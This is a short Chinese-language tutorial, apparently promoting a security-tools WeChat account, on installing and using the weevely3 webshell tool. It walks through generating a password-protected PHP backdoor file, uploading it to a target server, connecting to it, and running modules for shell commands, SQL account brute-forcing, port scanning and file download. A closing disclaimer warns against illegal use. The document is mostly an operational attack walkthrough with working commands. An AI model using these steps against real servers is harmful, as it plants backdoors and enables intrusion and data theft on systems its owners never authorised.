本文共 818 字，大约阅读时间需要 2 分钟。

运行在Linux系统上的WebShell管理工具，功能包括Shell访问目标、SQL控制台、HTTP/HTTPS代理浏览、文件上传下载、反向和直接TCP Shell生成、远程目标安全审核、端口扫描以及Bruteforce SQL账户攻击。

安装与使用指南

1. 下载

通过GitHub克隆项目仓库：

git clone https://github.com/epinna/weevely3.git

2. 安装依赖

进入项目目录并安装所需Python模块：

cd weebely3  
pip3 install -r requirements.txt

3. 启动工具

运行主脚本启动WebShell管理界面：

./weevely.py

4. 生成木马文件

在指定目录生成连接木马文件：

./weevely.py generate 123 shell.php

5. 上传木马文件

将生成的shell.php文件上传至目标服务器。

6. 连接木马

通过命令连接木马：

./weevely.py http://目标IP:目标端口/shell.php 123

7. 操作木马

• 获取文件目录：

dir

• 利用模块收集信息：

system_info -info uname

• 查看可用模块：

help

8. 使用模块

支持多种操作模块，如：

• 执行Shell命令：:shell_sh
• PHP命令：:shell_php
• Brute force SQL：:bruteforce_sql
• 端口扫描：:net_scan
• 文件操作：:file_find, :file_download, :file_cd
• 远程文件挂载：:file_mount
• SQL控制台：:sql_console

9. 注意事项

• 非法使用将导致法律后果，使用时请遵守相关法律法规。
• 建议在测试环境中练习，确保操作安全。

10. 关注

• 订阅公众号“Web安全工具库”：
  欢迎关注视频号“之乎者也吧”。